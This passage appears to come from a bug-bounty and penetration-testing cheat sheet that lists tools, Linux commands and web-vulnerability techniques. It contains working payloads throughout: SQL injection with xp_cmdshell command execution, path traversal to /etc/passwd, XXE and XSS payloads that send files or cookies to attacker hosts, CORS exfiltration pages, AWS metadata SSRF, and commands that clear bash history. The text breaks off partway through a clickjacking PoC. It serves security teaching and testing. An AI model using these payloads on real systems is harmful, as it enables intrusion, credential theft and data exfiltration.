- [IP Rotate](https://portswigger.net/bappstore/2eb2b1cb1cf34cc79cda36f0f9019874)
- [Autorize](https://github.com/PortSwigger/autorize)
- [Active Scan++](https://portswigger.net/bappstore/3123d5b5f25c4128894d97ea1acc4976)
- [BurpJSLinkFinder](https://github.com/PortSwigger/js-link-finder)
- [Anonymous Cloud](https://portswigger.net/bappstore/ea60f107b25d44ddb59c1aee3786c6a1)
- [AWS Security Checks](https://portswigger.net/bappstore/f078b9254eab40dc8c562177de3d3b2d)
- [Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
- [Taborator](https://portswigger.net/bappstore/c9c37e424a744aa08866652f63ee9e0f)
- [AutoRepeater](https://github.com/nccgroup/AutoRepeater)
- [JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
## Network
```
ip route add <net_address_in_cdr> via <interface_gateway>
route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> (Windows)
nmap -sn <net_address_in_cdr> | Check hosts alive, adding -A you gather more info for a target
```
**Resources**
- [Echo Mirage](https://resources.infosecinstitute.com/topic/echo-mirage-walkthrough/)
- [Wireshark](https://www.wireshark.org/)
- [PCredz](https://github.com/lgandx/PCredz)
- [Impacket](https://github.com/SecureAuthCorp/impacket)
- [putty](https://www.putty.org/)
## Linux
**Linux Commands**
```
netstat -tulpn Show Linux network ports with process ID’s (PIDs)
watch ss -stplu Watch TCP, UDP open ports in real time with socket summary.
lsof -i Show established connections.
macchanger -m MACADDR INTR Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1 Dig reverse lookup on an IP address.
host 192.168.1.1 Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR Perform a DNS zone transfer using dig.
host -l domain.com nameserver Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com Blocks access to google.com from the host machine.
echo \"1\" > /proc/sys/net/ipv4/ip_forward Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box.
echo \"8.8.8.8\" > /etc/resolv.conf Use Google DNS.
```
**Linux User Management**
```
whoami Shows currently logged in user on Linux.
id Shows currently logged in user and groups for the user.
last Shows last logged in users.
mount Show mounted drives.
df -h Shows disk usage in human readable output.
echo \"user:passwd\" | chpasswd Reset password in one line.
getent passwd List users on Linux.
strings /usr/local/bin/blah Shows contents of none text files, e.g. whats in a binary.
uname -ar Shows running kernel version.
PATH=$PATH:/my/new-path Add a new PATH, handy for local FS manipulation.
history Show bash history, commands the user has entered previously.
```
**Linux File Commands**
```
df -h blah Display size of file / dir Linux.
diff file1 file2 Compare / Show differences between two files on Linux.
md5sum file Generate MD5SUM Linux.
md5sum -c blah.iso.md5 Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf Remove files and directories without prompting for confirmation.
```
**Misc Commands**
```
init 6 Reboot Linux from the command line.
gcc -o output.c input.c Compile C code.
gcc -m32 -o output.c input.c Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE Disable bash history logging.
rdesktop X.X.X.X Connect to RDP server from Linux.
kill -9 $$ Kill current session.
chown user:group blah Change owner of file or dir.
chown -R user:group blah Change owner of file or dir and all underlying files / dirs – recersive chown.
chmod 600 file Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.
ssh [email protected] | cat /dev/null > ~/.bash_history Clear bash history
```
**Linux File System Permissions**
```
777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.
```
**Linux Directories**
```
/ / also know as “slash” or the root.
/bin Common programs, shared by the system, the system administrator and the users.
/boot Boot files, boot loader (grub), kernels, vmlinuz
/dev Contains references to system devices, files with special properties.
/etc Important system config files.
/home Home directories for system users.
/lib Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found Files that were saved during failures are here.
/mnt Standard mount point for external file systems.
/media Mount point for external file systems (on some distros).
/net Standard mount point for entire remote file systems – nfs.
/opt Typically contains extra and third party software.
/proc A virtual file system containing information about system resources.
/root root users home dir.
/sbin Programs for use by the system and the system administrator.
/tmp Temporary space for use by the system, cleaned upon reboot.
/usr Programs, libraries, documentation etc. for all user-related programs.
/var Storage for all variable files and temporary files created by users, such as log files, mail queue,
print spooler. Web servers, Databases etc.
```
**Linux Interesting Files / Directories**
```
/etc/passwd Contains local Linux users.
/etc/shadow Contains local account password hashes.
/etc/group Contains local account groups.
/etc/init.d/ Contains service init script – worth a look to see whats installed.
/etc/hostname System hostname.
/etc/network/interfaces Network interfaces.
/etc/resolv.conf System DNS servers.
/etc/profile System environment variables.
~/.ssh/ SSH keys.
~/.bash_history Users bash history log.
/var/log/ Linux system log files are typically stored here.
/var/adm/ UNIX system log files are typically stored here.
/var/log/apache2/access.log Apache access log file typical path.
/var/log/httpd/access.log Apache access log file typical path.
/etc/fstab File system mounts.
```
## Mobile
**FlappyBird_structure.apk**<br/>
├── **AndroidManifest.xml** meta-information about the app<br/>
├── **META-INF/** a manifest of metadata information<br/>
├── **classes.dex** contains the Java libraries that the application uses<br/>
├── **lib/** compiled native libraries used by the app<br/>
├── **res/** It can store resource files such as pictures, XML files, etc.<br/>
├── **assets/** application assets<br/>
└── **resources.arsc** contains compiled resources in a binary format
**Android tools**
- [m.apkpure.com](https://m.apkpure.com/it/) Download APKs
- [apps.evozi.com](https://apps.evozi.com/apk-downloader/) Download APKs
- [apk-dl.com](http://apk-dl.com/) Download APKs
- [adb](https://developer.android.com/studio/command-line/adb) it is used to debug an android device
- [HTTP Toolkit](https://httptoolkit.tech/) to see requests on a non-rooted or emulated device
- [Genymotion](https://www.genymotion.com/) an android emulator
- [Android Studio](https://developer.android.com/studio) Android application development, useful also for the emulator
- Note: to start only the emulator, use commands such as
```cmd
cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator
emulator -avd Pixel_4_XL_API_30
```
- [Java Decompiler](https://java-decompiler.github.io/)
- [dex2jar](https://github.com/pxb1988/dex2jar) decompile an .apk into .jar
- [jadx-gui](https://github.com/skylot/jadx/releases) another tool for producing Java source code from Android Dex and Apk files
- [apktool](https://ibotpeaches.github.io/Apktool/) to unpack an apk
## Source code review
- Search for known dangerous functions used on user-supplied input
- example, `eval(` can cause command injection without proper sanitization
- Search for hardcoded credentials such as API keys, encryption keys and database passwords
- many API keys start with the same format (ex. AWS keys usually start with `AKIA`), search for patterns
<img src="https://raw.githubusercontent.com/seeu-inspace/easyg/main/img/Screenshot_20221110_171255.png">
from [ServletTarPit.java](https://github.com/ShiftLeftSecurity/tarpit-java/blob/master/src/main/java/io/shiftleft/tarpit/ServletTarPit.java), [Tarpit Java](https://github.com/ShiftLeftSecurity/tarpit-java)
- Search for weak cryptography or hashing algorithms
- Search for outdated dependencies
- Search for revealing comments
**Digging deeeper**
- Prioritize functions like authentication, autorization, PII etc.
- example: disclosing PII in the logs, from [OrderStatus.java](https://github.com/ShiftLeftSecurity/tarpit-java/blob/master/src/main/java/io/shiftleft/tarpit/OrderStatus.java)
<img src="https://raw.githubusercontent.com/seeu-inspace/easyg/main/img/Screenshot_20221110_172648.png">
- example: SQL injection in [OrderStatus.java](https://github.com/ShiftLeftSecurity/tarpit-java/blob/master/src/main/java/io/shiftleft/tarpit/OrderStatus.java)
<img src="https://raw.githubusercontent.com/seeu-inspace/easyg/main/img/Screenshot_20221110_173028.png">
- Follow any code that deals with user input
**Automation**
- Use SAST tools
- Use SCA tools
- Use secret scanners
- Then test the results manually
**Resources**
- [How to Analyze Code for Vulnerabilities](https://www.youtube.com/watch?v=A8CNysN-lOM)
- [OWASP Code Review Guide](https://owasp.org/www-project-code-review-guide/)
- [Tarpit Java](https://github.com/ShiftLeftSecurity/tarpit-java)
- [TruffleHog](https://github.com/trufflesecurity/trufflehog)
- [GitLeaks](https://github.com/zricethezav/gitleaks)
## Web vulnerabilities
### <ins>SQL injection</ins>
**Tools**
- [SQL injection cheat sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
- [sqlmap](https://sqlmap.org/)
```
> SQLMap: sqlmap -u https://vulnerable/index.php?id=1
--tables (to see db)
-D DATABASE_NAME -T TABLE_NAME --dump (to see data)
--forms --batch --crawl=10 --random-agent --level=5 --risk=3 (to crawl)
```
**Some payloads**
- ```SQL
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
```
- ```SQL
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
```
- ```SQL
0'or(now()=sysdate()&&SLEEP(1))or'Z
```
**RCE**
```sql
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'COMMAND';
```
```
EXEC sp_configure 'allow updates', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
xp_cmdshell 'COMMAND';
```
### <ins>Authentication vulnerabilities</ins>
- Multi-factor authentication
- Response manipulation, try to intercept the response and modify the status to `200`
- Status code manipulation, change the code from `4xx` to `200`
- 2FA code leakage in the response
- JS File Analysis
- 2FA Code Reusability
- Lack of Bruteforce protection
- The 2FA code can be used for any user
- CSRF on 2FA disabling
- Password reset disable 2FA
- Bypass 2FA with null or `000000`
- Access the content directly
- Login with Oauth to bypass 2FA
- If you get logged-out after failed attempts, use macros with Burp
- Password reset
- Change the `Host` with the host of your server. The request for a password reset might use the `Host` value for the link with the reset token
- Try with headers like `X-Forwarded-Host:`
- Via dangling markup
- `Host: victim.com:'<a href="//attacker.com/?`
- Insert two emails, like:
- `[email protected];[email protected]`
- `email:["[email protected]","[email protected]"]`
- [Password change](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change)
- [Keeping users logged in](https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie)
- Rate-limit
- Bypass with `X-Forwarded-For:127.0.0.1-1000`
- IP rotating, you can use
- [mubeng](https://github.com/kitabisa/mubeng)
- [Burp extension: IP Rotate](https://portswigger.net/bappstore/2eb2b1cb1cf34cc79cda36f0f9019874)
- Log in into a valid account to reset the rate-limit
- Test remember me functionality
- Web Cache Deception
- Attacker send to a victim a 404 endpoint like `site.com/dir/ok.css`
- Victim click on it, the CDN cache the page
- Attacker goes to `site.com/dir/ok.css`, now it can see the page of the Victim
- PHP protections can be bypassed with `[]`, like `password=123` to `password[]=123`
- Replace password with a list of candidates, example
```
"username":"usertest"
"password":[
"123456",
"password",
"qwerty",
...
```
### <ins>Directory Traversal</ins>
- simple case `https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini`
- absolute path `https://insecure-website.com/loadImage?filename=/etc/passwd`
- stripped non-recursively `https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd`
- superfluous URL-decode `https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd`
- validation of start of path `https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd`
- validation of start of path `https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png`
### <ins>OS Command Injection</ins>
Let's say that the vulnerable endpoint it's `https://insecure-website.com/stockStatus?productID=381&storeID=29`. The provide the stock information, the application runs the command `stockpile.pl 381 29`. If there is no OS Command Injection protection, by inserting the payload `& echo abcdefg &` in `productID` it's possible to execute the command `echo`.
For blind OS Command Injections
- Time delay `& ping -c 10 127.0.0.1 &`
- Redirecting output `& whoami > /var/www/static/whoami.txt &`
- Out-of-band (OAST) techniques `& nslookup kgji2ohoyw.web-attacker.com &`
Ways of injecting OS commands
- Both Windows and Unix-based systems
- `&`
- `&&`
- `|`
- `||`
- Unix-based systems only
- `;`
- Newline with `0x0a` or `\n`
- `injected command`
- `$(injected command)`
**Resource**
- [commix-testbed](https://github.com/commixproject/commix-testbed)
### <ins>Business logic vulnerabilities</ins>
**Examples**
- Excessive trust in client-side controls
- 2FA broken logic
- Failing to handle unconventional input
- Inconsistent security controls
- Weak isolation on dual-use endpoint
- Password reset broken logic
- Insufficient workflow validation
- Flawed enforcement of business rules
- [Authentication bypass via encryption oracle](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-authentication-bypass-via-encryption-oracle)
### <ins>Information Disclosure</ins>
What is information disclosure?
- Data about other users, such as usernames or financial information
- Sensitive commercial or business data
- Technical details about the website and its infrastructure
What are some examples of information disclosure?
- Revealing the names of hidden directories, their structure, and their contents via a robots.txt file or directory listing
- Providing access to source code files via temporary backups
- Explicitly mentioning database table or column names in error messages
- Unnecessarily exposing highly sensitive information, such as credit card details
- Hard-coding API keys, IP addresses, database credentials, and so on in the source code
- Hinting at the existence or absence of resources, usernames, and so on via subtle differences in application behavior
- If you need to find UUID from an email, try to register the user and see if in the response it's disclosed. [[Reference](https://twitter.com/intigriti/status/1217794181982302208)]
How do information disclosure vulnerabilities arise?
- Failure to remove internal content from public content
- Insecure configuration of the website and related technologies
- Flawed design and behavior of the application
### <ins>Access control vulnerabilities and privilege escalation</ins>
In the context of web applications, access control is dependent on authentication and session management:
- Authentication identifies the user and confirms that they are who they say they are;
- Session management identifies which subsequent HTTP requests are being made by that same user;
- Access control determines whether the user is allowed to carry out the action that they are attempting to perform.
From a user perspective, access controls can be divided into the following categories:
- Vertical access controls
Mechanisms that restrict access to sensitive functionality that is not available to other types of users
- Horizontal access controls
Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
- Context-dependent access controls
Restrict access to functionality and resources based upon the state of the application or the user's interaction with it
**Tools**
- [Autorize](https://github.com/PortSwigger/autorize)
- [Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e)
- [UUID Detector](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248)
- Check also endpoints in JS files
### <ins>File upload vulnerabilities</ins>
**Upload Functions check-list**
- [ ] Integrations (from 3rd party)
- XSS
- [ ] Self Uploads
- XML based (Docs/PDF)
- SSRF, XSS
- Image
- XSS, Shell
- Name
- Binary header
- Metadata
- [ ] Where is data stored?
- [s3 perms](#abusing-s3-bucket-permissions)
- [GCS perms](#google-cloud-storage-bucket)
**Resource**
- [How I earned $500 by uploading a file: write-up of one of my first bug bounty](https://medium.com/@seeu-inspace/how-i-earned-500-by-uploading-a-file-write-up-of-one-of-my-first-bug-bounty-c174cf8ea553)
### <ins>Server-side request forgery (SSRF)</ins>
**SSRF with blacklist-based input filters bypass**
Some applications block input containing hostnames like `127.0.0.1` and localhost, or sensitive URLs like `/admin`. In this situation, you can often circumvent the filter using various techniques:
- Using an alternative IP representation of `127.0.0.1`, such as `2130706433`, `017700000001`, or `127.1`;
- Registering your own domain name that resolves to `127.0.0.1`. You can use spoofed.burpcollaborator.net for this purpose or the domain `firefox.fr` is a DNS that point to `127.0.0.1`.;
- Obfuscating blocked strings using URL encoding or case variation.
**SSRF with whitelist-based input filters bypass**
- You can embed credentials in a URL before the hostname, using the `@` character. For example: `https://expected-host@evil-host`.
- You can use the `#` character to indicate a URL fragment. For example: `https://evil-host#expected-host`.
- You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: `https://expected-host.evil-host`.
- You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
- You can use combinations of these techniques together.
**Other tips**
- By combining it with an open redirect, you can bypass some restrictions. [An example](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection): `http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos`
- [Open redirection](#open-redirection)
- For AWS, bypass some restrictions by hosting this PHP page ([Reference](https://hackerone.com/reports/508459)):
```PHP
<?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>
```
- If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [[Reference](https://twitter.com/bogdantcaciuc7/status/1561572514295341058)]
- [SSRF (Server Side Request Forgery) testing resources](https://github.com/cujanovic/SSRF-Testing)
**Common endpoints**
- Webhooks
- Try to send requests to internal resources
- PDF Generator
- If there is an HTML Injection in a PDF generator, try call internal resources with something like `<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" title="SSRF test">`, with these tags `<img>`, `<script>`, `<base>` or with the CSS element `url()`
- Document parsers
- If it's an XML doc, use the PDF Generator approach
- In other scenarios, see if there is any way to reference external resources and let server make requests to internal resources
- Link expansion
- Open Graph Protocol is a good case for Blind SSRF / Extract of Meta Data, [[Reference](https://twitter.com/BugBountyHQ/status/868242771617792000)]
- File uploads
- Instead of uploading a file, upload a URL. [An example](https://hackerone.com/reports/713)
**Automate with Burp**
- [Collaborator Everywhere](https://portswigger.net/bappstore/2495f6fb364d48c3b6c984e226c02968)
- [Taborator](https://portswigger.net/bappstore/c9c37e424a744aa08866652f63ee9e0f) + [AutoRepeater](https://github.com/nccgroup/AutoRepeater) [[Source](https://twitter.com/Bugcrowd/status/1586058991758675969)]
```
- Type: Request Param Value
- Match: ^(https?|ftp)://[^\s/$.?#].[^\s]*$
- Replace: http://$collabplz/
- Comment: Burp Collab
- Regex Match: [x]
```
### <ins>Open redirection</ins>
**Bypasses**
- https://attacker.com?victim.com
- https://attacker.com;victim.com
- https://attacker.com/victim.com/../victimPATH
- https://victim.com.attacker.com
- https://attackervictim.com
- https://[email protected]
- https://attacker.com#victim.com
- https://attacker.com\.victim.com
- https://attacker.com/.victim.com
- https://subdomain.victim.com/r/redir?url=https%3A%2F%2Fvictim.com%40ATTACKER_WEBSITE.COM?x=subdomain.victim.com%2f
### <ins>XXE injection</ins>
- **Exploiting XXE to retrieve files**<br/>
Original
```xml
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>
```
Modified
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```
- **Exploiting XXE to perform SSRF attacks**
```xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerablewebsite.com/"> ]>
```
- **Exploiting blind XXE exfiltrate data out-of-band**<br/>
Example
```xml
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://web-attacker.com"> %xxe; ]>
```
- **Exfiltrate data out-of-band**<br/>
for-the-malicious-web-server.dtd
```dtd
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://webattacker.com/?x=%file;'>">
%eval;
%exfil;
```
Submit to vulnerable server
```xml
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://webattacker.com/malicious.dtd"> %xxe;]>
```
- **Exploiting blind XXE to retrieve data via error messages**
```dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```
- **Exploiting blind XXE by repurposing a local DTD**<br/>
Suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`
```
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM
'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
```
To locate the DTD file, submit the payload
```xml
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM
"file:///usr/share/yelp/dtd/docbookx.dtd">
%local_dtd;
]>
```
- **Try with xinclude to achieve SSRF or LFI**
```XML
<?xml version="1.0" encoding="utf-8" ?>
<username xmls:xi="https://w3.org/2001/XInclude">
<xi:include parse="text" href="file:///c:/windows/win.ini">
</username>
```
Attack surfaces
- **XInclude attacks**
```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
- **XXE attacks via file upload with** `.svg`
```svg
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITYxxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
- **XXE attacks via modified content type**<br/>
For example, Content-Type: `application/x-www-form-urlencoded` -> `Content-Type: text/xml`
Manually testing for XXE vulnerabilities generally involves
- Testing for file retrieval
- Testing for blind XXE vulnerabilities
- Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document
### <ins>Cross-site scripting (XSS)</ins>
**Tools**
- [xsscrapy](https://github.com/DanMcInerney/xsscrapy)
- [python3 version](https://github.com/L1NT/xsscrapy)
- For blind XSS
- [XSS Hunter Express](https://github.com/mandatoryprogrammer/xsshunter-express)
- [XSS Hunter](https://xsshunter.com/)
- [AwesomeXSS](https://github.com/s0md3v/AwesomeXSS)
- [ppfuzz](https://github.com/dwisiswant0/ppfuzz) a fast tool to scan client-side prototype pollution vulnerability
**CSP bypass**
- [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com/)
- [CSP Auditor](https://portswigger.net/bappstore/35237408a06043e9945a11016fcbac18)
- [CSP Bypass](https://github.com/PortSwigger/csp-bypass)
**Bypasses**
- https://www.googleapis.com/customsearch/v1?callback=alert(document.domain)
- [JSFuck](http://www.jsfuck.com/)
- [Path Relative style sheet injection](https://portswigger.net/kb/issues/00200328_path-relative-style-sheet-import)
- [Cross-site scripting (XSS) cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
- [Shortest rXSS possible](https://brutelogic.com.br/blog/shortest-reflected-xss-possible/)
- If Privileges are required, see if you can chain the XSS with a CSRF
**Swagger XSS**
- https://github.com/swagger-api/swagger-ui/issues/1262
- https://github.com/swagger-api/swagger-ui/issues/3847<br/>
`?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json`
- [Hacking Swagger-UI - from XSS to account takeovers](https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/)<br/>
`?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==`
- Nuclei template `%USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml`
**CRLF injection** [[Reference](https://www.acunetix.com/websitesecurity/crlf-injection/)]
- `/%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--`
- `/%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--`
- Nuclei template `%USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml`
**Cross Site Tracing**
- If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. Reference: https://owasp.org/www-community/attacks/Cross_Site_Tracing
**Blind XSS**
- Insert a payload in the User-Agent, try with the match/replace rule
- Other endpoints: pending review comments, feedback
**DoS**
- `%22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D` This could lead the page to refresh quickly and infinitely causing being blocked by a WAF and being a potential DoS.
**Payloads**
- HTML inj
```HTML
<p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">
```
- [Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
- [For hidden inputs](https://portswigger.net/research/xss-in-hidden-input-fields): `accesskey="X" onclick="alert(1)"` then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X
- For **mobile applications**: try use as a vector the name of the phone with a payload like `"/><script>alert(1)</script>`
- For **desktop applications**: try use as a vector the SSID with a payload like `"/><img src=x onerror=alert(1)>`
- iframe + base64 encoded SVG
```HTML
<iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgICAgIGFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>
```
- Cookie stealers
- ```JavaScript
fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.domain});
```
- ```JavaScript
document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.domain + '\" />')
```
- ```HTML
<img src=x onerror=this.src='http://ATTACKER-WEBSITE/?'+document.domain;>
```
- onbeforeinput + contenteditable
```JavaScript
%22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22
```
- ```JavaScript
1672&81782%26apos%3b%3balert(%26apos%3bXSS%26apos%3b)%2f%2f232=1
```
### <ins>Cross-site request forgery (CSRF)</ins>
- Remove the entire token
- Use any random but same-length token, or `same-length+1`/`same-length-1`
- Use another user's token
- Change from `POST` to `GET` and delete the token
- If it's a `PUT` or `DELETE` request, try `POST /profile/update?_method=PUT` or
```
POST /profile/update HTTP/1.1
Host: vuln.com
...
_method=PUT
```
- If the token it's in a custom header, delete the header
- Change the `Content-Type` to `application/json`, `application/x-url-encoded` or `form-multipart`, `text/html`, `application/xml`
- If there is double submit token, try CRLF injection
- Bypassing referrer check
- If it's checked but only when it exists, add to the PoC `<meta name="referrer" content="never">`
- Regex Referral bypass
```
- https://attacker.com?victim.com
- https://attacker.com;victim.com
- https://attacker.com/victim.com/../victimPATH
- https://victim.com.attacker.com
- https://attackervictim.com
- https://[email protected]
- https://attacker.com#victim.com
- https://attacker.com\.victim.com
- https://attacker.com/.victim.com
```
- CSRF token stealing via XSS/HTMLi/CORS
- JSON based
- Change the `Content-Type` to `text/plain`, `application/x-www-form-urlencoded`, `multipart/form-data`
- Use flash + 307 redirect
- Guessable CSRF token
- Clickjacking to strong CSRF token bypass
- Type juggling
- Use array, from `csrf=token` to `csrf[]=token`
- Set the CSRF token to null or add null bytes
- Check whether CSRF token is sent over http or sent to 3rd party
- Generate multiple CSRF tokens, pick the static part. Play with the dynamic part
**Resources**
- [CSRF PoC Generator](https://security.love/CSRF-PoC-Genorator/)
### <ins>Cross-origin resource sharing (CORS)</ins>
**Classic CORS vulnerability**
```HTML
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','$url/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
```
**CORS vulnerability with null origin**
```HTML
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='malicious-website.com/log?key='+this.responseText;
};</script>">
</iframe>
```
**CORS vulnerability with trusted insecure protocols**
```HTML
<script>
document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```
**Tools**
- [Corsy](https://github.com/s0md3v/Corsy) Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations
### <ins>Clickjacking</ins>
**Classic PoC**
```HTML
<style>
iframe {
position:relative;
width:$width_value;
height: $height_value;
opacity: $opacity;
z-index: 2;
}
div {
position:absolute;
top:$top_value;
left:$side_value;
